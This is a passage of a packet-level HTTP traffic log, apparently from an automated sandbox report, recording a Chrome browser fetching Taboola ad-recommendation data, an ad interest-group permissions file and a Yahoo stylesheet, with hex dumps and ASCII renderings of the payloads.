                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Origin: https://www.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:04 UTC1252INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    P3P: policyref="http://trc.taboola.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://www.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: t_pid=27eb735b-f48b-4088-80a5-78ec8c9435df-tuctdf46380;Path=/;Expires=Tue, 30-Sep-2025 17:21:04 GMT;Secure;SameSite=None
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: receive-cookie-deprecation=1;Path=/;Domain=.taboola.com;Expires=Tue, 30-Sep-2025 17:21:04 GMT;Secure;HttpOnly;SameSite=None;Partitioned
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: taboola_session_id=v2_180b7abcdacfe26a5edf97d1d328e529_27eb735b-f48b-4088-80a5-78ec8c9435df-tuctdf46380_1727716864_1727716864_CIi3jgYQm9teGIXczJ-kMiABKAEw4QE4kaQOQNWmD0jZiNcDUPUDWABgAGiOuMvY8NrPu1twAYABAA;Version=1;Path=/yahoo-home/;Domain=.taboola.com;Secure;SameSite=None
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    cpu: 0.5458333333333333
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Fastly-to-NLB-rtt: 19917
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 17:21:04 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-SERVICE-VERSION: v1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Served-By: cache-ewr-kewr1740026-EWR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Cache: MISS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Cache-Hits: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Timer: S1727716864.489923,VS0,VE205
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-vcl-time-ms: 205
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:04 UTC5INData Raw: 63 61 32 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ca2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:04 UTC1378INData Raw: 74 72 63 5f 6a 73 6f 6e 5f 72 65 73 70 6f 6e 73 65 20 3d 0a 7b 22 74 72 63 22 3a 7b 22 73 69 22 3a 22 31 38 30 62 37 61 62 63 64 61 63 66 65 32 36 61 35 65 64 66 39 37 64 31 64 33 32 38 65 35 32 39 22 2c 22 73 64 22 3a 22 76 32 5f 31 38 30 62 37 61 62 63 64 61 63 66 65 32 36 61 35 65 64 66 39 37 64 31 64 33 32 38 65 35 32 39 5f 32 37 65 62 37 33 35 62 2d 66 34 38 62 2d 34 30 38 38 2d 38 30 61 35 2d 37 38 65 63 38 63 39 34 33 35 64 66 2d 74 75 63 74 64 66 34 36 33 38 30 5f 31 37 32 37 37 31 36 38 36 34 5f 31 37 32 37 37 31 36 38 36 34 5f 43 49 69 33 6a 67 59 51 6d 39 74 65 47 49 58 63 7a 4a 2d 6b 4d 69 41 42 4b 41 45 77 34 51 45 34 6b 61 51 4f 51 4e 57 6d 44 30 6a 5a 69 4e 63 44 55 50 55 44 57 41 42 67 41 47 69 4f 75 4d 76 59 38 4e 72 50 75 31 74 77 41 59
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: trc_json_response ={"trc":{"si":"180b7abcdacfe26a5edf97d1d328e529","sd":"v2_180b7abcdacfe26a5edf97d1d328e529_27eb735b-f48b-4088-80a5-78ec8c9435df-tuctdf46380_1727716864_1727716864_CIi3jgYQm9teGIXczJ-kMiABKAEw4QE4kaQOQNWmD0jZiNcDUPUDWABgAGiOuMvY8NrPu1twAY
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:04 UTC1378INData Raw: 72 22 3a 22 22 2c 22 69 73 2d 73 79 6e 64 69 63 61 74 65 64 22 3a 22 74 72 75 65 22 2c 22 69 64 22 3a 22 7e 7e 56 31 7e 7e 2d 36 38 38 32 33 32 33 35 39 37 30 36 37 39 37 31 37 31 33 7e 7e 38 41 68 73 59 70 57 4b 69 4a 53 2d 6b 6e 39 66 71 4c 5a 70 39 64 72 61 73 33 59 49 79 76 44 71 76 46 42 32 70 74 50 31 53 52 6f 65 37 39 4e 69 2d 65 42 6e 64 38 69 51 34 4b 6d 76 76 58 2d 51 4a 5f 55 5f 57 50 45 64 77 54 6d 31 33 2d 41 5a 62 30 48 61 34 70 2d 67 66 43 64 44 49 5a 32 6f 50 4d 52 74 37 55 4c 72 4e 61 53 55 52 70 56 68 48 42 50 2d 54 55 38 44 57 47 74 37 4d 6d 35 53 4a 69 45 44 76 63 41 4f 30 5f 4a 4f 75 78 76 6f 32 43 6c 61 35 68 6f 54 65 49 72 74 35 73 78 5f 79 64 44 69 39 6e 32 53 54 7a 48 72 37 41 6e 4d 4f 46 39 6a 4d 45 2d 50 5a 45 48 6f 43 52 63 5a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: r":"","is-syndicated":"true","id":"~~V1~~-6882323597067971713~~8AhsYpWKiJS-kn9fqLZp9dras3YIyvDqvFB2ptP1SRoe79Ni-eBnd8iQ4KmvvX-QJ_U_WPEdwTm13-AZb0Ha4p-gfCdDIZ2oPMRt7ULrNaSURpVhHBP-TU8DWGt7Mm5SJiEDvcAO0_JOuxvo2Cla5hoTeIrt5sx_ydDi9n2STzHr7AnMOF9jME-PZEHoCRcZ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:04 UTC478INData Raw: 76 5f 69 41 54 43 62 32 31 34 22 2c 22 69 74 65 6d 2d 69 64 22 3a 22 7e 7e 56 31 7e 7e 2d 36 38 38 32 33 32 33 35 39 37 30 36 37 39 37 31 37 31 33 7e 7e 38 41 68 73 59 70 57 4b 69 4a 53 2d 6b 6e 39 66 71 4c 5a 70 39 64 72 61 73 33 59 49 79 76 44 71 76 46 42 32 70 74 50 31 53 52 6f 65 37 39 4e 69 2d 65 42 6e 64 38 69 51 34 4b 6d 76 76 58 2d 51 4a 5f 55 5f 57 50 45 64 77 54 6d 31 33 2d 41 5a 62 30 48 61 34 70 2d 67 66 43 64 44 49 5a 32 6f 50 4d 52 74 37 55 4c 72 4e 61 53 55 52 70 56 68 48 42 50 2d 54 55 38 44 57 47 74 37 4d 6d 35 53 4a 69 45 44 76 63 41 4f 30 5f 4a 4f 75 78 76 6f 32 43 6c 61 35 68 6f 54 65 49 72 74 35 73 78 5f 79 64 44 69 39 6e 32 53 54 7a 48 72 37 41 6e 4d 4f 46 39 6a 4d 45 2d 50 5a 45 48 6f 43 52 63 5a 22 2c 22 74 62 6c 63 69 22 3a 22 47
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: v_iATCb214","item-id":"~~V1~~-6882323597067971713~~8AhsYpWKiJS-kn9fqLZp9dras3YIyvDqvFB2ptP1SRoe79Ni-eBnd8iQ4KmvvX-QJ_U_WPEdwTm13-AZb0Ha4p-gfCdDIZ2oPMRt7ULrNaSURpVhHBP-TU8DWGt7Mm5SJiEDvcAO0_JOuxvo2Cla5hoTeIrt5sx_ydDi9n2STzHr7AnMOF9jME-PZEHoCRcZ","tblci":"G
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:04 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:04 UTC5INData Raw: 66 33 34 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: f34
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:04 UTC1378INData Raw: 62 22 3a 22 43 49 59 45 22 2c 22 76 22 3a 5b 7b 22 65 63 70 61 50 65 72 63 65 6e 74 69 6c 65 22 3a 22 30 2e 33 35 22 2c 22 61 6c 6c 2d 74 68 75 6d 62 6e 61 69 6c 73 22 3a 22 68 74 74 70 3a 2f 2f 63 64 6e 2e 74 61 62 6f 6f 6c 61 2e 63 6f 6d 2f 6c 69 62 74 72 63 2f 73 74 61 74 69 63 2f 74 68 75 6d 62 6e 61 69 6c 73 2f 30 65 63 66 31 33 62 64 30 63 35 36 39 38 66 39 33 38 30 63 64 61 32 31 61 33 35 37 38 34 61 30 2e 6a 70 67 21 2d 23 40 31 32 30 30 78 36 37 34 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 59 6f 75 20 43 61 6e 20 53 74 6f 70 20 50 61 79 69 6e 67 20 66 6f 72 20 54 56 20 77 69 74 68 20 74 68 69 73 20 6e 65 77 20 69 6e 63 72 65 64 69 62 6c 65 20 54 56 20 41 6e 74 65 6e 6e 61 22 2c 22 74 69 74 6c 65 22 3a 22 4d 69 6c 6c 69 6f 6e 73 20 6f 66
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: b":"CIYE","v":[{"ecpaPercentile":"0.35","all-thumbnails":"http://cdn.taboola.com/libtrc/static/thumbnails/0ecf13bd0c5698f9380cda21a35784a0.jpg!-#@1200x674","description":"You Can Stop Paying for TV with this new incredible TV Antenna","title":"Millions of
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:04 UTC1378INData Raw: 2c 22 69 74 65 6d 2d 69 64 22 3a 22 7e 7e 56 31 7e 7e 31 30 36 30 30 38 30 31 39 34 38 39 39 30 35 30 31 30 31 7e 7e 30 4d 7a 36 65 62 47 31 37 34 54 30 72 33 49 73 5f 4d 55 6d 57 66 4f 2d 4e 63 6c 59 42 70 73 74 74 36 4c 33 6c 67 73 57 78 66 50 6e 6f 5a 75 65 41 73 6e 4d 30 55 54 6b 71 52 69 7a 2d 6f 38 75 75 4b 61 32 5f 72 75 70 4c 39 49 30 6b 76 78 31 58 56 75 66 75 74 32 71 4b 49 4a 72 53 4e 4a 5f 49 6e 57 4b 50 54 66 59 63 67 7a 69 38 51 39 78 72 77 43 52 56 39 31 54 69 44 33 30 4a 69 4c 6e 4e 59 79 55 6e 35 2d 78 6b 31 73 52 57 4c 2d 45 52 34 6c 4f 77 71 72 52 43 41 67 6f 33 54 51 35 74 43 66 39 6c 66 63 33 30 73 64 57 44 46 6c 33 6d 41 66 71 67 6a 62 47 5f 63 38 6e 45 6c 6e 7a 54 53 38 4d 61 75 78 32 6a 57 43 31 67 52 55 33 6e 78 35 41 37 6d 54 7a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ,"item-id":"~~V1~~1060080194899050101~~0Mz6ebG174T0r3Is_MUmWfO-NclYBpstt6L3lgsWxfPnoZueAsnM0UTkqRiz-o8uuKa2_rupL9I0kvx1XVufut2qKIJrSNJ_InWKPTfYcgzi8Q9xrwCRV91TiD30JiLnNYyUn5-xk1sRWL-ER4lOwqrRCAgo3TQ5tCf9lfc30sdWDFl3mAfqgjbG_c8nElnzTS8Maux2jWC1gRU3nx5A7mTz
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:04 UTC1136INData Raw: 70 6f 70 6f 76 65 72 2e 63 6f 6e 74 65 6e 74 2e 71 75 65 73 74 69 6f 6e 6e 61 69 72 65 2e 6f 70 74 69 6f 6e 73 2e 6d 69 73 6c 65 61 64 69 6e 67 22 3a 22 4d 69 73 6c 65 61 64 69 6e 67 22 2c 22 72 65 6d 6f 76 65 42 74 6e 2e 74 69 74 6c 65 22 3a 22 52 65 6d 6f 76 65 20 74 68 69 73 20 69 74 65 6d 22 2c 22 70 6f 70 6f 76 65 72 2e 63 6f 6e 74 65 6e 74 2e 71 75 65 73 74 69 6f 6e 6e 61 69 72 65 2e 74 65 6c 6c 55 73 57 68 79 22 3a 22 54 65 6c 6c 20 75 73 20 77 68 79 3f 22 2c 22 70 6f 70 6f 76 65 72 2e 63 6f 6e 74 65 6e 74 2e 71 75 65 73 74 69 6f 6e 6e 61 69 72 65 2e 6f 70 74 69 6f 6e 73 2e 6f 74 68 65 72 22 3a 22 4f 74 68 65 72 22 2c 22 70 6f 70 6f 76 65 72 2e 63 6f 6e 74 65 6e 74 2e 61 70 70 72 6f 76 61 6c 22 3a 22 57 65 20 77 69 6c 6c 20 74 72 79 20 6e 6f 74 20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: popover.content.questionnaire.options.misleading":"Misleading","removeBtn.title":"Remove this item","popover.content.questionnaire.tellUsWhy":"Tell us why?","popover.content.questionnaire.options.other":"Other","popover.content.approval":"We will try not
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:04 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii:


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    135192.168.2.44989718.239.36.684434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:04 UTC477OUTGET /.well-known/interest-group/permissions/?origin=https%3A%2F%2Fgps-aa.ybp.yahoo.com HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: pa.ybp.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: application/json
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Origin: https://gps-aa.ybp.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:04 UTC450INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: awselb/2.0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 11:27:44 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Via: 1.1 012634059e5295fc11d3d3daf0b68c7e.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Amz-Cf-Pop: AMS58-P2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Amz-Cf-Id: YpP6XuRxgQOBozq6419oDiQy1Vuu39T_7n9NVUypu0SH_TZXXcrXmw==
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 21200
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Ad-Auction-Allowed: true
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Allow-FLEDGE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:04 UTC65INData Raw: 7b 0a 20 20 22 6a 6f 69 6e 41 64 49 6e 74 65 72 65 73 74 47 72 6f 75 70 22 3a 20 74 72 75 65 2c 0a 20 20 22 6c 65 61 76 65 41 64 49 6e 74 65 72 65 73 74 47 72 6f 75 70 22 3a 20 74 72 75 65 0a 7d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: { "joinAdInterestGroup": true, "leaveAdInterestGroup": true}


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    136192.168.2.44989987.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:04 UTC553OUTGET /aaq/cprops/colors_1.1.27.min.css HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:04 UTC663INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: zhfnfw0/21FF4QfFWQS9ABNhhzFwP7eJRKjgmRJU5ZtmjH4ZII569mVyRIUsxPmG9XGtV6RCAiw=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: DCTSXHS8651GDK73
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 24 Sep 2024 18:45:34 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 10 Jan 2023 00:56:08 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "14b81b9d43cc8eb81ae45eebbaae258c"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-version-id: NXuB5LUlzqQuAXf127xyo2NVNfa.SWqk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 6179
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 513331
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:04 UTC1300INData Raw: 3a 72 6f 6f 74 2c 68 74 6d 6c 5b 64 61 74 61 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3d 64 61 72 6b 5d 20 5b 64 61 74 61 2d 6d 61 69 6e 74 61 69 6e 2d 63 6f 6c 6f 72 5d 2c 68 74 6d 6c 5b 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 2d 65 6e 61 62 6c 65 64 5d 20 5b 64 61 74 61 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3d 6c 69 67 68 74 5d 2c 68 74 6d 6c 5b 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 2d 65 6e 61 62 6c 65 64 5d 5b 64 61 74 61 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3d 6c 69 67 68 74 5d 7b 2d 2d 62 61 72 62 69 65 3a 23 66 38 30 65 35 64 3b 2d 2d 62 61 72 6e 65 79 3a 23 63 63 30 30 38 63 3b 2d 2d 62 61 74 63 61 76 65 3a 23 32 33 32 61 33 31 3b 2d 2d 62 61 74 74 6c 65 73 68 69 70 3a 23 35 62 36 33 36 61 3b 2d 2d 62 6c 61 63 6b 3a 23 30 30 30
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: :root,html[data-color-scheme=dark] [data-maintain-color],html[data-color-theme-enabled] [data-color-scheme=light],html[data-color-theme-enabled][data-color-scheme=light]{--barbie:#f80e5d;--barney:#cc008c;--batcave:#232a31;--battleship:#5b636a;--black:#000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:04 UTC1300INData Raw: 61 74 69 6f 6e 2d 31 3a 30 20 31 70 78 20 30 20 72 67 62 61 28 76 61 72 28 2d 2d 72 67 62 2d 64 69 72 74 79 2d 73 65 61 67 75 6c 6c 29 2c 31 29 3b 2d 2d 65 6c 65 76 61 74 69 6f 6e 2d 32 3a 30 20 30 20 31 70 78 20 72 67 62 61 28 76 61 72 28 2d 2d 72 67 62 2d 62 6c 61 63 6b 29 2c 30 2e 31 29 2c 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 76 61 72 28 2d 2d 72 67 62 2d 62 6c 61 63 6b 29 2c 30 2e 30 38 29 3b 2d 2d 65 6c 65 76 61 74 69 6f 6e 2d 33 3a 30 20 30 20 31 70 78 20 72 67 62 61 28 76 61 72 28 2d 2d 72 67 62 2d 62 6c 61 63 6b 29 2c 30 2e 30 38 29 2c 30 20 34 70 78 20 38 70 78 20 72 67 62 61 28 76 61 72 28 2d 2d 72 67 62 2d 62 6c 61 63 6b 29 2c 30 2e 31 29 3b 2d 2d 65 6c 65 76 61 74 69 6f 6e 2d 34 3a 30 20 30 20 32 70 78 20 72 67 62 61 28 76 61 72 28 2d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ation-1:0 1px 0 rgba(var(--rgb-dirty-seagull),1);--elevation-2:0 0 1px rgba(var(--rgb-black),0.1),0 2px 4px rgba(var(--rgb-black),0.08);--elevation-3:0 0 1px rgba(var(--rgb-black),0.08),0 4px 8px rgba(var(--rgb-black),0.1);--elevation-4:0 0 2px rgba(var(-
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:04 UTC1300INData Raw: 72 67 62 2d 77 68 69 74 65 3a 32 39 2c 33 34 2c 34 30 3b 2d 2d 65 6c 65 76 61 74 69 6f 6e 2d 31 3a 30 20 31 70 78 20 30 20 72 67 62 61 28 76 61 72 28 2d 2d 72 67 62 2d 62 6c 61 63 6b 29 2c 31 29 2c 30 20 30 20 31 70 78 20 72 67 62 61 28 76 61 72 28 2d 2d 72 67 62 2d 62 6c 61 63 6b 29 2c 30 2e 38 35 29 3b 2d 2d 65 6c 65 76 61 74 69 6f 6e 2d 32 3a 30 20 30 20 31 70 78 20 72 67 62 61 28 76 61 72 28 2d 2d 72 67 62 2d 62 6c 61 63 6b 29 2c 30 2e 39 29 2c 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 76 61 72 28 2d 2d 72 67 62 2d 62 6c 61 63 6b 29 2c 30 2e 39 32 29 3b 2d 2d 65 6c 65 76 61 74 69 6f 6e 2d 33 3a 30 20 30 20 31 70 78 20 72 67 62 61 28 76 61 72 28 2d 2d 72 67 62 2d 62 6c 61 63 6b 29 2c 30 2e 39 32 29 2c 30 20 34 70 78 20 38 70 78 20 72 67 62 61 28 76
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: rgb-white:29,34,40;--elevation-1:0 1px 0 rgba(var(--rgb-black),1),0 0 1px rgba(var(--rgb-black),0.85);--elevation-2:0 0 1px rgba(var(--rgb-black),0.9),0 2px 4px rgba(var(--rgb-black),0.92);--elevation-3:0 0 1px rgba(var(--rgb-black),0.92),0 4px 8px rgba(v
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:04 UTC1300INData Raw: 35 3b 2d 2d 72 67 62 2d 67 72 65 79 2d 68 61 69 72 3a 34 34 2c 35 34 2c 36 33 3b 2d 2d 72 67 62 2d 69 6e 6b 77 65 6c 6c 3a 32 35 35 2c 32 35 35 2c 32 35 35 3b 2d 2d 72 67 62 2d 77 68 69 74 65 3a 32 39 2c 33 34 2c 34 30 3b 2d 2d 65 6c 65 76 61 74 69 6f 6e 2d 31 3a 30 20 31 70 78 20 30 20 72 67 62 61 28 76 61 72 28 2d 2d 72 67 62 2d 62 6c 61 63 6b 29 2c 31 29 2c 30 20 30 20 31 70 78 20 72 67 62 61 28 76 61 72 28 2d 2d 72 67 62 2d 62 6c 61 63 6b 29 2c 30 2e 38 35 29 3b 2d 2d 65 6c 65 76 61 74 69 6f 6e 2d 32 3a 30 20 30 20 31 70 78 20 72 67 62 61 28 76 61 72 28 2d 2d 72 67 62 2d 62 6c 61 63 6b 29 2c 30 2e 39 29 2c 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 76 61 72 28 2d 2d 72 67 62 2d 62 6c 61 63 6b 29 2c 30 2e 39 32 29 3b 2d 2d 65 6c 65 76 61 74 69 6f 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 5;--rgb-grey-hair:44,54,63;--rgb-inkwell:255,255,255;--rgb-white:29,34,40;--elevation-1:0 1px 0 rgba(var(--rgb-black),1),0 0 1px rgba(var(--rgb-black),0.85);--elevation-2:0 0 1px rgba(var(--rgb-black),0.9),0 2px 4px rgba(var(--rgb-black),0.92);--elevation
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:04 UTC979INData Raw: 65 70 73 3a 23 37 64 63 62 66 66 3b 2d 2d 70 6c 61 79 64 6f 68 3a 23 32 31 64 38 37 64 3b 2d 2d 72 61 6d 6f 6e 65 73 3a 23 32 63 33 36 33 66 3b 2d 2d 73 61 70 70 68 69 72 65 3a 23 32 66 30 30 36 30 3b 2d 2d 73 63 6f 6f 74 65 72 3a 23 30 30 36 33 65 62 3b 2d 2d 73 65 61 2d 66 6f 61 6d 3a 23 31 31 64 33 63 64 3b 2d 2d 73 68 61 72 6b 3a 23 38 32 38 61 39 33 3b 2d 2d 73 6b 79 3a 23 31 32 61 39 66 66 3b 2d 2d 73 6d 75 72 66 65 74 74 65 3a 23 31 38 38 66 66 66 3b 2d 2d 73 6f 6c 6f 2d 63 75 70 3a 23 65 62 30 66 32 39 3b 2d 2d 73 70 69 72 75 6c 69 6e 61 3a 23 30 30 39 63 39 34 3b 2d 2d 73 74 61 72 66 69 73 68 3a 23 37 37 35 39 66 66 3b 2d 2d 73 77 65 64 69 73 68 2d 66 69 73 68 3a 23 66 66 33 33 33 61 3b 2d 2d 74 68 61 6e 6f 73 3a 23 39 30 37 63 66 66 3b 2d 2d 74
